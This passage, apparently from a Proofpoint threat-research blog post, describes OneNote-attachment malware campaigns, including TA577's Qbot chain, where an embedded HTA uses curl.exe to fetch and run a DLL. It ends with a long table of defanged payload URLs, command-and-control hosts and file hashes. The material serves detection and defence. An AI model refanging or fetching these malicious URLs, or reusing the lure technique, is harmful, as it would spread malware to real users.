access broker TA577 returned from a month-long hiatus in activity on 31 January 2023 to deliver Qbot with an attack chain that included OneNote. Emails appeared to be replies to previous conversations containing a unique URL in the email body. Figure 6: OneNote document lure used by TA577. The URLs led to the download of a zipped OneNote file. If the OneNote was opened, the template advised the victim to "Double click Open". Below the graphic there was an attached file named attachment.hta (but the extension was hidden). If the victim double clicked the file and confirmed the security prompt, JavaScript code was executed that downloads a file from a remote URL and displayed a fake error message. The HTA uses "curl.exe” to download the Qbot DLL, and run it with the function, “Wind”. While the December 2022 campaigns included more customized and targeted messages and themes, the malware campaigns observed in January 2023 were more generic and broadly targeted. Proofpoint does not attribute identified campaigns to a tracked threat actor. OSINT ASSESSMENT Proofpoint researchers have associated multiple artifacts observed in the campaigns with GitHub repositories associated with user MREXw. This includes the payload domain “direct-trojan[.]com” and a batch file encryption technique. Researchers contacted the domain host to alert users the domain is malicious. CONCLUSION Proofpoint has increasingly observed OneNote attachments being used to deliver malware. Based on our research, we believe multiple threat actors are using OneNote attachments in an attempt to bypass threat detections. TA577’s adoption of OneNote suggests other more sophisticated actors will begin using this technique soon. This is concerning: TA577 is an initial access broker that facilitates follow-on infections for additional malware including ransomware. Based on data in open-source malware repositories, initially observed attachments were not detected as malicious by multiple anti-virus engines, thus it is likely initial campaigns had a high efficacy rate if the email was not blocked. (Proofpoint customers were protected as the messages were deemed malicious). It is likely more threat actors will adopt OneNote attachments to deliver malware. It is important to note, an attack is only successful if the recipient engages with the attachment, specifically by clicking on the embedded file and ignoring the warning message displayed by OneNote. Organizations should educate end users about this technique and encourage users to report suspicious emails and attachments. SAMPLE INDICATORS OF COMPROMISE Indicator Description First Seen hxxps[:]files.catbox[.]moe/rltrtq.bat AsyncRAT Payload URL 19 December 2022 209.126.83[.]213 AsyncRAT C2 19 December 2022 e5a33b42b71f8ac1a5371888d11a0066b49a7f0c25fe74857fa07fb0c9bdff27 OneNote Attachment SHA256 19 December 2022 43f4eaefc6e71f8d30b2e3749475af51ce4d6740546706113cc4785b4410a14c OneNote Attachment SHA256 19 December 2022 hxxp[:]3.101.39[.]145/Excel.exe AsyncRAT Payload URL 19 December 2022 hxxp[:]3.101.39[.]145/TPAEROSPACE.one AsyncRAT Payload URL 19 December 2022 6a1bac8fbb30f4b98da7f7ac190fb971bf91d15b41748bc63fd9cbddb96ef189 OneNote Attachment SHA256 19 December 2022 hxxp[:]54.151.95[.]132/Access.one AsyncRAT Payload URL 13 December 2022 hxxp[:]54.151.95[.]132/ExcelSheel.vbs AsyncRAT Payload URL 13 December 2022 2283c3be89eb6cbf0e1579a6e398a5d1f81a50793fcca22fbc6cbdab53dc2d31 OneNote Attachment SHA256 19 December 2022 hxxps[:]www.onenotegem[.]com/uploads/soft/one-templates/four-quadrant.one AsyncRAT Payload URL 23 December 2022 hxxps[:]transfer[.]sh/get/TScdAm/AsyncClient.bat AsyncRAT Payload URL 23 December 2022 209.126.83[.]213 AsyncRAT C2 23 December 2022 75819879049e80de6376f146430e63a53fc4291d21f3db930ea872b82d07c77a OneNote Attachment SHA256 23 December 2022 hxxp[:]www.onenotegem[.]com/uploads/soft/one-templates/the_daily_schedule.one AsyncRAT Payload URL 04 January 2023 hxxps[:]depotejarat[.]ir/voicemail.bat AsyncRAT Payload URL 04 January 2023 hxxps[:]zaminkaran[.]ir/new.png AsyncRAT Payload URL 04 January 2023 73dc35d1fa8d1e3147a5fe6056e01f89847441ec46175ba60b24a56b7fbdf2f9 OneNote Attachment SHA256 04 January 2023 hxxps[:]www.onenotegem[.]com/uploads/soft/one-templates/the_daily_schedule.one AsyncRAT Payload URL 05 January 2023 hxxps[:]transfer[.]sh/get/Pcj58k/AsyncClient.bat AsyncRAT Payload URL 05 January 2023 154.12.234[.]207 AsyncRAT C2 05 January 2023 newtryex.ddns[.]net AsyncRAT C2 05 January 2023 8276104d8d47def986063b8fbafd82ad5f4cd23862ff9ede1231cefb35115a1b OneNote Attachment SHA256 05 January 2023 hxxps[:]onenotegem[.]com/uploads/soft/one-templates/weekly_assignments.one AsyncRAT Payload URL 07 January 2023 hxxps[:]transfer[.]sh/rMitxs/Invoice212.bat AsyncRAT Payload URL 07 January 2023 45.133.174[.]122 AsyncRAT C2 07 January 2023 e2b70c8552b38a6b8722d614254202c346190c6a187984a4450223eb536aaf4b OneNote Attachment SHA256 07 January 2023 ef5a7fc0c2a301b57f0723af97faea37374b91eb3b72d8ca6ffc09a095998bb2 OneNote Attachment SHA256 07 January 2023 66c045eb61f2e589b1e27db284c9c518e5d0e87dcff25b096eede7047f7dd207 OneNote Attachment SHA256 07 January 2023 hxxps[:]transfer.sh/get/cOrt9R/me.bat QuasarRAT Payload URL 09 January 2023 154.12.234[.]207 QuasarRAT C2 09 January 2023 c59f95d9c9ff830d33fb73c2a8b0ee8be6619b6823fc23210600b9fa88a8c9d4 OneNote Attachment SHA256 09 January 2023 hxxps[:]stnicholaschurch[.]ca/DCyaz.bat AsyncRAT Payload URL 09 January 2023 winery.nsupdate[.]info AsyncRAT C2 09 January 2023 c8e326756cc1f95ff51ffe26471df16f4131fdbca2ed14f8c8d14e21010058b9 OneNote Attachment SHA256 09 January 2023 hxxps[:]www.onenotegem[.]com/uploads/soft/one-templates/notes_to_do_list.one AsyncRAT Payload URL 09 January 2023 hxxps[:]transfer[.]sh/get/5dLEvB/sky.bat AsyncRAT Payload URL 09 January 2023 154.12.250[.]38 AsyncRAT C2 09 January 2023 15212428deeeabcd5b11a1b8383c654476a3ea1b19b804e4aca606fac285387f OneNote Attachment SHA256 09 January 2023 hxxps[:]stnicholaschurch[.]ca/Cardlock_341121.bat AsyncRAT Payload URL 09 January 2023 hxxps[:]stnicholaschurch[.]ca/xw.bat XWorm Payload URL 09 January 2023 su1d.nerdpol[.]ovh AsyncRAT and XWorm C2 09 January 2023 222b1a425f75fc7998a0bbabd52277cd82bb5ec50b75f4fb67568b3b754f5406 OneNote Attachment SHA256 09 January 2023 377fe4e55b6dde063c15c41389f3bb5aacf95443874bdcc0d02a44d6bd793780 OneNote Attachment SHA256 09 January 2023 bdc52f8983b7f034e86d1628efab5faf974e8c33ea9c3bcab0fd09ca462f8322 OneNote Attachment SHA256 09 January 2023 de30f2ba2d8916db5ce398ed580714e2a8e75376f31dc346b0e3c898ee0ae4cf OneNote Attachment SHA256 09 January 2023 a5ae1b866c5d8a7b3eb8427e686cf5d0264b809ed4491b47346542bf69caab65 OneNote Attachment SHA256 09 January 2023 hxxps[:]transfer[.]sh/get/7msVcM/FRESHME.bat AsyncRAT Payload URL 10 January 2023 hxxps[:]transfer[.]sh/IGu2K2/INV.bat AsyncRAT Payload URL 10 January 2023 newtryex.ddns[.]net AsyncRAT C2 10 January 2023 a748f4e526c1a5fed7e57887ef951e451236ee3ad39cf6161d18e5c2230aca0b OneNote Attachment SHA256 10 January 2023 adb237144a52fc610984bd5ae8501271c5eef8ff49eff0a9d02adf4a5e36ad3b OneNote Attachment SHA256 10 January 2023 hxxps[:]direct-trojan[.]com/file/b685b9/New%20Section%201.one Redline Payload URL 11 January 2023 hxxps[:]direct-trojan[.]com/file/05df70/remlog.bat Redline Payload URL 11 January 2023 172.245.45[.]213 Redline C2 11 January 2023 dfb8ba6c2ac264ac73f6d2c440d2c0744c043f1d8435bb798fef5380a649fc4e OneNote Attachment SHA256 11 January 2023 hxxps[:]direct-trojan[.]com/file/3c6f73/software-update.exe AgentTesla Payload URL 11 January 2023 ftp://ftp.mgcpakistan[.]com/ AgentTesla C2 11 January 2023 e1d34ad42938a777d80f3ee4c206de14021f13ab79600168b85894fdb0867b3e OneNote Attachment SHA256 11 January 2023 hxxp[:]198.23.172[.]90/new.exe Netwire Payload URL 12 January 2023 hxxp[:]198.23.172[.]90/template.one Netwire Payload URL 12 January 2023 212.193.30[.]230:3345 Netwire C2 12 January 2023 328a12fdd6b485362befb392925282451d65aa23482584a49dd5b0e126218df7 OneNote Attachment SHA256 12 January 2023 hxxp[:]179.43.187[.]241/Downloads/Newsharedfilesnow.pdf.lnk Redline Payload URL 12 January 2023 hxxps[:]transfer[.]sh/get/UaTsxp/Newsharedfilesnow.hta Redline Payload URL 12 January 2023 109.107.179[.]248:80 Redline C2 12 January 2023 0ff4aa2eb1cd681e3b77348af935bcfc56f4b7cae48bcd826000b7ff2b82b671 OneNote Attachment SHA256 12 January 2023 plax.duckdns[.]org AsyncRAT C2 13 January 2023 212.193.30[.]230 Netwire C2 14 January 2023 hxxp[:]198.23.172[.]90/templa.one Netwire Payload URL 14 January 2023 hxxp[:]198.23.172[.]90/comment.exe Netwire Payload URL 14 January 2023 0b0c70ee1612139cf7a83847cca805689aec9fbcc587a7ef8f26aa4fb9e71295 OneNote Attachment SHA256 14 January 2023 209.126.2[.]34 AsyncRAT C2 15 January 2023 hxxps[:]transfer[.]sh/get/p29ViK/tpee.bat AsyncRAT Payload URL 15 January 2023 1791dd7a7c7d0688fac3626d57221ada157c57572cf9ed46ad4cab3d28dbaf91 OneNote Attachment SHA256 15 January 2023 hxxps[:]files.catbox[.]moe/nvz0g1.ps1 Quasar RAT Payload URL 16 January 2023 95.216.102[.]32 Quasar RAT C2 16 January 2023 ghcc.duckdns[.]org Quasar RAT C2 16 January 2023 9bf99fc32dc69f213812c3c747e8dd41fef63ad0fd0aec01a6b399aeb10a166a OneNote Attachment SHA256 16 January 2023 hxxps[:]barricks[.]org/admin10/client.php DOUBLEBACK C2 19 January 2023 hxxp[:]kanaskanas[.]com/fw435tv345t.ps1 DOUBLEBACK VBS Payload 19 January 2023 hxxps[:]codezian[.]com/Nt57/300123.gif Qbot HTA Payload URL 31 January 2023 https[:]myvigyan[.]com/m1YPt/300123.gif Qbot HTA Payload URL 31 January 2023 Previous Blog Post Next Blog Post Subscribe to the Proofpoint Blog * Business Email: Select * Blog Interest: AllArchiving and ComplianceCISO PerspectivesCloud SecurityCorporate NewsEmail and Cloud ThreatsEngineering InsightsInformation ProtectionInsider Threat ManagementRemote Workforce ProtectionSecurity Awareness TrainingSecurity BriefsThreat Insight Submit ABOUT * Overview * Why Proofpoint * Careers * Leadership Team * News Center * Nexus Platform * Privacy and Trust THREAT CENTER * Threat Hub * Cybersecurity Awareness Hub * Ransomware Hub * Threat Glossary * Threat Blog * Daily Ruleset PRODUCTS * Email Security & Protection * Advanced Threat Protection * Security Awareness Training * Cloud Security * Archive & Compliance * Information Protection * Digital Risk Protection * Product Bundles RESOURCES * White Papers * Webinars * Data Sheets * Events * Customer Stories * Blog * Free Trial CONNECT * +1-408-517-4710 * Contact Us * Office Locations * Request a Demo SUPPORT * Support Login * Support Services * IP Address Blocked? * Facebook * Twitter * linkedin * Youtube * English (US) * English (UK) * English (AU) * Español * Deutsch * Français * Italiano * Português * 日本語 * 한국어 © 2023. All rights reserved. Terms and conditions Privacy Policy Sitemap